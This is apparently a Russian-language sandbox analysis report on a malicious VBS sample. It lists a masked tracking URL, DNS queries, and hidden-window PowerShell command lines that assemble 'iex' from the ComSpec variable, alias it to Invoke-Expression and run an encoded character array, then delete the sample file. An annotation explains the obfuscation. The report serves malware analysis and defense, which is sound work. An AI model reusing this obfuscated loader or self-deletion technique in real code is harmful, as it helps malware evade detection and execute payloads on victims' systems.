Техническая информация
- http://of#######eaner-commander.com/track.jpg
- DNS ASK google.com
- DNS ASK of#######eaner-commander.com
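- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $cd=$env:cOmsPec[4,26,25]-jOin'';sal mj $cd;$fvn5uhreyi3h4utj43u5j=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,108,32,77,32,36,84,...' (со скрытым окном)
  Примечание: при стандартном значении ComSpec (…\system32\cmd.exe) символы с индексами 4, 26 и 25 дают строку «iex», поэтому псевдоним mj указывает на Invoke-Expression. Видимое начало массива кодов символов декодируется как `$Tbone='*EX'.replace('*','I');sal M $T` — тот же приём сборки «IEX» повторяется на следующем уровне. Командная строка в отчёте обрезана («...»), поэтому дальнейшее содержимое скрипта здесь не видно.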
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Remove-Item '<PATH_SAMPLE>.vbs'' (со скрытым окном) — удаление VBS-файла образца
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $cd=$env:cOmsPec[4,26,25]-jOin'';sal mj $cd;$fvn5uhreyi3h4utj43u5j=@(36,84,98,111,110,101,61,39,42,69,88,39,46,114,101,112,108,97,99,101,40,39,42,39,44,39,73,39,41,59,115,97,108,32,77,32,36,84,...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Remove-Item '<PATH_SAMPLE>.vbs'